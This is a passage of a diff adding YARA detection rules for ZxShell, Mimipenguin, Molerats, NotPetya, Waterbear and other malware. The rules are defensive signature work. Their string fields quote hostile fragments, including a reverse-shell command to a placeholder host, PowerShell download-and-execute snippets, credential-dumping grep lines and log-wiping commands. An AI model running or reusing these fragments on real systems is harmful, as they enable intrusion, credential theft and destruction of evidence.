+      $s1 = "%c%c%c%c%ccn.exe" fullword ascii
+      $s2 = "hra%u.dll" fullword ascii
+      $s3 = "Referer: http://%s:80/http://%s" fullword ascii
+      $s5 = "Accept-Language: zh-cn" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule ZxShell_Related_Malware_CN_Group_Jul17_3_RID3603 : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects a ZxShell related sample from a CN threat group"
+      author = "Florian Roth"
+      reference = "https://blogs.rsa.com/cat-phishing/"
+      date = "2017-07-08 16:37:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2e5cf8c785dc081e5c2b43a4a785713c0ae032c5f86ccbc7abf5c109b8854ed7"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s\\nt%s.dll" fullword ascii
+      $s2 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and all of them )
+}
+
+rule ZxShell_Jul17_RID2BCD : APT CHINA DEMO T1007 {
+   meta:
+      description = "Detects a ZxShell - CN threat group"
+      author = "Florian Roth"
+      reference = "https://blogs.rsa.com/cat-phishing/"
+      date = "2017-07-08 09:22:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16"
+      tags = "APT, CHINA, DEMO, T1007"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "zxplug -add" fullword ascii
+      $x2 = "getxxx c:\\xyz.dll" fullword ascii
+      $x3 = "downfile -d c:\\windows\\update.exe" fullword ascii
+      $x4 = "-fromurl http://x.x.x/x.dll" fullword ascii
+      $x5 = "ping 127.0.0.1 -n 7&cmd.exe /c net start %s" fullword ascii
+      $x6 = "ZXNC -e cmd.exe x.x.x.x" fullword ascii
+      $x7 = "(bind a cmdshell)" fullword ascii
+      $x8 = "ZXFtpServer 21 20 zx" fullword ascii
+      $x9 = "ZXHttpServer" fullword ascii
+      $x10 = "c:\\error.htm,.exe|c:\\a.exe,.zip|c:\\b.zip\"" fullword ascii
+      $x11 = "c:\\windows\\clipboardlog.txt" fullword ascii
+      $x12 = "AntiSniff -a wireshark.exe" fullword ascii
+      $x13 = "c:\\windows\\keylog.txt" fullword ascii
+   condition: 
+      ( filesize < 10000KB and 1 of them ) or 3 of them
+}
+
+rule mimipenguin_1_RID2C43 : DEMO FILE HKTL {
+   meta:
+      description = "Detects Mimipenguin hack tool"
+      author = "Florian Roth"
+      reference = "https://github.com/huntergregal/mimipenguin"
+      date = "2017-07-08 09:41:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9e8d13fe27c93c7571075abf84a839fd1d31d8f2e3e48b3f4c6c13f7afcf8cbd"
+      tags = "DEMO, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "self._strings_dump += strings(dump_process(target_pid))" fullword ascii
+      $x2 = "def _dump_target_processes(self):" fullword ascii
+      $x3 = "self._target_processes = ['sshd:']" fullword ascii
+      $x4 = "GnomeKeyringPasswordFinder()" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
+}
+
+rule mimipenguin_2_RID2C44 : DEMO FILE HKTL {
+   meta:
+      description = "Detects Mimipenguin hack tool"
+      author = "Florian Roth"
+      reference = "https://github.com/huntergregal/mimipenguin"
+      date = "2017-07-08 09:41:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "453bffa90d99a820e4235de95ec3f7cc750539e4023f98ffc8858f9b3c15d89a"
+      tags = "DEMO, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "DUMP=$(strings \"/tmp/dump.${pid}\" | grep -E" fullword ascii
+      $x2 = "strings /tmp/apache* | grep -E '^Authorization: Basic.+=$'" fullword ascii
+      $x3 = "grep -E '^_pammodutil_getpwnam_root_1$' -B 5 -A" fullword ascii
+      $x4 = "strings \"/tmp/dump.${pid}\" | grep -E -m 1 '^\\$.\\$.+\\$')\"" fullword ascii
+      $x5 = "if [[ -n $(ps -eo pid,command | grep -v 'grep' | grep gnome-keyring) ]]; then" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
+}
+
+rule Unspecified_Malware_Jul17_1A_RID316B : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects samples of an unspecified malware - July 2017"
+      author = "Florian Roth"
+      reference = "Winnti HDRoot VT"
+      date = "2017-07-07 13:21:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e1c38142b6194237a4cd4603829aa6edb6436e7bba15e3e6b0c9e8c6b629b42b"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%SystemRoot%\\System32\\wuauserv.dll" fullword ascii
+      $s2 = "systemroot%\\system32\\wuauserv.dll" fullword ascii
+      $s3 = "ocgen.logIN" fullword wide
+      $s4 = "ocmsn.logIN" fullword wide
+      $s5 = "Install.log" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 900KB and all of them )
+}
+
+rule Molerats_Jul17_Sample_1_RID2F9B : APT DEMO EXE FILE G0021 {
+   meta:
+      description = "Detects Molerats sample - July 2017"
+      author = "Florian Roth"
+      reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+      date = "2017-07-07 12:04:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
+      tags = "APT, DEMO, EXE, FILE, G0021"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ezExODA0Y2U0LTkzMGEtNGIwOS1iZjcwLTlmMWE5NWQwZDcwZH0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{c00" wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule Molerats_Jul17_Sample_2_RID2F9C : APT DEMO EXE FILE G0021 {
+   meta:
+      description = "Detects Molerats sample - July 2017"
+      author = "Florian Roth"
+      reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+      date = "2017-07-07 12:04:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7e122a882d625f4ccac019efb7bf1b1024b9e0919d205105e7e299fb1a20a326"
+      tags = "APT, DEMO, EXE, FILE, G0021"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Folder.exe" fullword ascii
+      $s2 = "Notepad++.exe" fullword wide
+      $s3 = "RSJLRSJOMSJ" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule Molerats_Jul17_Sample_3_RID2F9D : APT DEMO EXE FILE G0021 {
+   meta:
+      description = "Detects Molerats sample - July 2017"
+      author = "Florian Roth"
+      reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+      date = "2017-07-07 12:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "995eee4122802c2dc83bb619f8c53173a5a9c656ad8f43178223d78802445131"
+      hash2 = "fec657a19356753008b0f477083993aa5c36ebaf7276742cf84bfe614678746b"
+      tags = "APT, DEMO, EXE, FILE, G0021"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ccleaner.exe" fullword wide
+      $s2 = "Folder.exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and all of them )
+}
+
+rule Molerats_Jul17_Sample_4_RID2F9E : APT DEMO G0021 {
+   meta:
+      description = "Detects Molerats sample - July 2017"
+      author = "Florian Roth"
+      reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+      date = "2017-07-07 12:04:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c"
+      tags = "APT, DEMO, G0021"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'KeyName')" wide
+      $x2 = "O.Run C & chrw(34) & \"[System.IO.File]::" wide
+      $x3 = "HKCU\\SOFTWARE\\Microsoft\\\\KeyName\"" fullword wide
+   condition: 
+      ( filesize < 700KB and 1 of them )
+}
+
+rule Molerats_Jul17_Sample_5_RID2F9F : APT DEMO G0021 T1105 {
+   meta:
+      description = "Detects Molerats sample - July 2017"
+      author = "Florian Roth"
+      reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+      date = "2017-07-07 12:05:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
+      tags = "APT, DEMO, G0021, T1105"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "powershell.exe -nop -c \"iex" nocase ascii
+      $x2 = ".run('%windir%\\\\SysWOW64\\\\WindowsPowerShell\\\\" ascii
+      $a1 = "Net.WebClient).DownloadString" nocase ascii
+      $a2 = "gist.githubusercontent.com" nocase ascii
+   condition: 
+      filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
+}
+
+rule Molerats_Jul17_Sample_Dropper_RID3246 : APT DEMO EXE FILE G0021 MAL {
+   meta:
+      description = "Detects Molerats sample dropper SFX - July 2017"
+      author = "Florian Roth"
+      reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+      date = "2017-07-07 13:58:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ad0b3ac8c573d84c0862bf1c912dba951ec280d31fe5b84745ccd12164b0bcdb"
+      tags = "APT, DEMO, EXE, FILE, G0021, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Please remove %s from %s folder. It is unsecure to run %s until it is done." fullword wide
+      $s2 = "sfxrar.exe" fullword ascii
+      $s3 = "attachment.hta" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule Disclosed_0day_POCs_InjectDll_RID3204 : DEMO EXE EXPLOIT FILE HKTL {
+   meta:
+      description = "Detects POC code from disclosed 0day hacktool set"
+      author = "Florian Roth"
+      reference = "Disclosed 0day Repos"
+      date = "2017-07-07 13:47:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "173d3f78c9269f44d069afbd04a692f5ae42d5fdc9f44f074599ec91e8a29aa2"
+      tags = "DEMO, EXE, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Release\\InjectDll.pdb" ascii
+      $x2 = "Specify -l to list all IE processes running in the current session" fullword ascii
+      $x3 = "Usage: InjectDll -l|pid PathToDll" fullword ascii
+      $x4 = "Injecting DLL: %ls into PID: %d" fullword ascii
+      $x5 = "Error adjusting privilege %d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+}
+
+rule Disclosed_0day_POCs_payload_MSI_RID32BD : DEMO EXPLOIT FILE HKTL {
+   meta:
+      description = "Detects POC code from disclosed 0day hacktool set"
+      author = "Florian Roth"
+      reference = "Disclosed 0day Repos"
+      date = "2017-07-07 14:18:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "a7c498a95850e186b7749a96004a98598f45faac2de9b93354ac93e627508a87"
+      tags = "DEMO, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "WShell32.dll" fullword wide
+      $s2 = "Target empty, so account name translation begins on the local system." fullword wide
+      $s3 = "\\custact\\x86\\AICustAct.pdb" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
+}
+
+rule Disclosed_0day_POCs_injector_RID31E9 : DEMO EXE EXPLOIT HKTL {
+   meta:
+      description = "Detects POC code from disclosed 0day hacktool set"
+      author = "Florian Roth"
+      reference = "Disclosed 0day Repos"
+      date = "2017-07-07 13:42:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ba0e2119b2a6bad612e86662b643a404426a07444d476472a71452b7e9f94041"
+      tags = "DEMO, EXE, EXPLOIT, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Release\\injector.pdb" ascii
+      $x2 = "Cannot write the shellcode in the process memory, error: " fullword ascii
+      $x3 = "/s shellcode_file PID: shellcode injection." fullword ascii
+      $x4 = "/d dll_file PID: dll injection via LoadLibrary()." fullword ascii
+      $x5 = "/s shellcode_file PID" fullword ascii
+      $x6 = "Shellcode copied in memory: OK" fullword ascii
+      $x7 = "Usage of the injector. " fullword ascii
+      $x8 = "KO: cannot obtain the SeDebug privilege." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 90KB and 1 of them ) or 3 of them
+}
+
+rule Disclosed_0day_POCs_lpe_2_RID305D : DEMO EXE EXPLOIT FILE HKTL {
+   meta:
+      description = "Detects POC code from disclosed 0day hacktool set"
+      author = "Florian Roth"
+      reference = "Disclosed 0day Repos"
+      date = "2017-07-07 12:36:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b4f3787a19b71c47bc4357a5a77ffb456e2f71fd858079d93e694a6a79f66533"
+      tags = "DEMO, EXE, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\cmd.exe\" /k wusa c:\\users\\" ascii
+      $s2 = "D:\\gitpoc\\UAC\\src\\x64\\Release\\lpe.pdb" fullword ascii
+      $s3 = "Folder Created: " fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 700KB and 2 of them )
+}
+
+rule Disclosed_0day_POCs_shellcodegenerator_RID3605 : DEMO EXE EXPLOIT FILE HKTL {
+   meta:
+      description = "Detects POC code from disclosed 0day hacktool set"
+      author = "Florian Roth"
+      reference = "Disclosed 0day Repos"
+      date = "2017-07-07 16:38:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "55c4073bf8d38df7d392aebf9aed2304109d92229971ffac6e1c448986a87916"
+      tags = "DEMO, EXE, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Release\\shellcodegenerator.pdb" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+}
+
+rule TeleDoor_Backdoor_RID2DB3 : DEMO EXE FILE MAL RANSOM {
+   meta:
+      description = "Detects the TeleDoor Backdoor as used in Petya Attack in June 2017"
+      author = "Florian Roth"
+      reference = "https://goo.gl/CpfJQQ"
+      date = "2017-07-05 10:43:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d462966166450416d6addd3bfdf48590f8440dd80fc571a389023b7c860ca3ac"
+      hash2 = "f9d6fe8bd8aca6528dec7eaa9f1aafbecde15fd61668182f2ba8a7fc2b9a6740"
+      hash3 = "2fd2863d711a1f18eeee5c7c82f2349c5d4e00465de9789da837fcdca4d00277"
+      tags = "DEMO, EXE, FILE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $c1 = { 50 61 79 6C 6F 61 64 00 41 75 74 6F 50 61 79 6C 6F 61 64 } 
+      $c2 = { 52 75 6E 43 6D 64 00 44 75 6D 70 44 61 74 61 } 
+      $c3 = { 00 5A 76 69 74 57 65 62 43 6C 69 65 6E 74 45 78 74 00 4D 69 6E 49 6E 66 6F } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 15000KB and 2 of them )
+}
+
+rule NotPetya_Ransomware_Jun17_RID30B7 : CRIME DEMO EXE FILE MAL RANSOM T1047 T1053 T1085 {
+   meta:
+      description = "Detects new NotPetya Ransomware variant from June 2017"
+      author = "Florian Roth"
+      reference = "https://goo.gl/h6iaGj"
+      date = "2017-06-27 12:51:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"
+      hash2 = "45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0"
+      hash3 = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"
+      tags = "CRIME, DEMO, EXE, FILE, MAL, RANSOM, T1047, T1053, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Ooops, your important files are encrypted." fullword wide ascii
+      $x2 = "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1 " fullword wide
+      $x3 = "-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1 " fullword wide
+      $x4 = "Send your Bitcoin wallet ID and personal installation key to e-mail " fullword wide
+      $x5 = "fsutil usn deletejournal /D %c:" fullword wide
+      $x6 = "wevtutil cl Setup & wevtutil cl System" ascii
+      $x7 = { 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E
+         00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00 } 
+      $s1 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\" " fullword wide
+      $s4 = "\\\\.\\pipe\\%ws" fullword wide
+      $s5 = "schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d" fullword wide
+      $s6 = "u%s \\\\%s -accepteula -s " fullword wide
+      $s7 = "dllhost.dat" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule PowerShell_in_Word_Doc_RID2FBC : DEMO FILE MAL OFFICE SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects a powershell and bypass keyword in a Word document"
+      author = "Florian Roth"
+      reference = "Internal Research - ME"
+      date = "2017-06-27 12:09:51"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905"
+      tags = "DEMO, FILE, MAL, OFFICE, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "POwErSHELl.ExE" fullword ascii nocase
+      $s2 = "BYPASS" fullword ascii nocase
+   condition: 
+      ( uint16 ( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
+}
+
+rule Wordpress_Config_Webshell_Preprend_RID34C3 : DEMO FILE MAL T1100 WEBSHELL {
+   meta:
+      description = "Webshell that uses standard Wordpress wp-config.php file and appends the malicious code in front of it"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-06-25 15:44:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = " * @package WordPress" fullword ascii
+      $s1 = "define('DB_NAME'," ascii
+      $s2 = "require_once(ABSPATH . 'wp-settings.php');" ascii
+      $fp1 = "iThemes Security Config" ascii
+   condition: 
+      uint32 ( 0 ) == 0x68703f3c and filesize < 400KB and $x1 and all of ( $s* ) and not $x1 in ( 0 .. 1000 ) and not 1 of ( $fp* )
+}
+
+rule Waterbear_1_Jun17_RID2D32 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:21:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dd3676f478ee6f814077a12302d38426760b0701bb629f413f7bf2ec71319db5"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\Release\\svc.pdb" ascii
+      $s2 = "svc.dll" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule Waterbear_6_Jun17_RID2D37 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:22:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "409cd490feb40d08eb33808b78d52c00e1722eee163b60635df6c6fe2c43c230"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "svcdll.dll" fullword ascii
+      $s2 = "log.log" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 60KB and all of them )
+}
+
+rule Waterbear_12_Jun17_RID2D64 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:29:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "15d9db2c90f56cd02be38e7088db8ec00fc603508ec888b4b85d60d970966585"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "O_PROXY" fullword ascii
+      $s2 = "XMODIFY" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule Waterbear_2_Jun17_RID2D33 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:21:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dcb5c350af76c590002a8ea00b01d862b4d89cccbec3908bfe92fdf25eaa6ea4"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "downloading movie" fullword ascii
+      $s2 = "name=\"test.exe\"/>" fullword ascii
+      $s3 = "<description>Test Application</description>" fullword ascii
+      $s4 = "UI look 2003" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule Waterbear_4_Jun17_RID2D35 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:22:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2e9cb7cadb3478edc9ef714ca4ddebb45e99d35386480e12792950f8a7a766e1"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" fullword ascii
+      $s1 = "Wininet.dll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA HttpQueryInfoA InternetReadFile InternetCloseHandle" fullword ascii
+      $s2 = "read from pipe:%s" fullword ascii
+      $s3 = "delete pipe" fullword ascii
+      $s4 = "cmdcommand:%s" fullword ascii
+      $s5 = "%s /c del %s" fullword ascii
+      $s6 = "10.0.0.250" fullword ascii
+      $s7 = "Vista/2008" fullword ascii
+      $s8 = "%02X%02X%02X%02X%02X%02X%04X" fullword ascii
+      $s9 = "UNKOWN" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+}
+
+rule Waterbear_7_Jun17_RID2D38 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:22:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6891aa78524e442f4dda66dff51db9798e1f92e6fefcdf21eb870b05b0293134"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Bluthmon.exe" fullword wide
+      $s2 = "Motomon.exe" fullword wide
+      $s3 = "%d.%s%d%d%d" fullword ascii
+      $s4 = "mywishes.hlp" fullword ascii
+      $s5 = "filemon.rtf" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+}
+
+rule Waterbear_9_Jun17_RID2D3A : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:22:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fc74d2434d48b316c9368d3f90fea19d76a20c09847421d1469268a32f59664c"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ADVPACK32.DLL" fullword wide
+      $s2 = "ADVPACK32" fullword wide
+      $a1 = "U2_Dll.dll" fullword ascii
+      $b1 = "ProUpdate" fullword ascii
+      $b2 = "Update.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and all of ( $s* ) and ( $a1 or all of ( $b* ) )
+}
+
+rule Waterbear_10_Jun17_RID2D62 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:29:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3b1e67e0e86d912d7bc6dee5b0f801260350e8ce831c93c3e9cfe5a39e766f41"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ADVPACK32.DLL" fullword wide
+      $s5 = "ADVPACK32" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+}
+
+rule Waterbear_11_Jun17_RID2D63 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:29:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b046b2e2569636c2fc3683a0da8cfad25ff47bc304145be0f282a969c7397ae8"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/Pages/%u.asp" fullword wide
+      $s2 = "NVIDIA Corporation." fullword wide
+      $s3 = "tqxbLc|fP_{eOY{eOX{eO" fullword ascii
+      $s4 = "Copyright (C) 2005" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule Waterbear_13_Jun17_RID2D65 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:30:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "734e5972ab5ac1e9bc5470c666a55e0d2bd57c4e2ea2da11dc9bf56fb2ea6f23"
+      hash2 = "8bde3f71575aa0d5f5a095d9d0ea10eceadba38be888e10d3ca3776f7b361fe7"
+      hash3 = "c4b3b0a7378bfc3824d4178fd7fb29475c42ab874d69abdfb4898d0bcd4f8ce1"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%WINDIR%\\PCHealth\\HelpCtr\\Binaries\\pchsvc.dll" fullword ascii
+      $s2 = "brnew.exe" fullword ascii
+      $s3 = "ChangeServiceConfig failed (%d)" fullword ascii
+      $s4 = "Proxy %d:%s %d" fullword ascii
+      $s5 = "win9807.tmp" fullword ascii
+      $s7 = "Service stopped successfully" fullword ascii
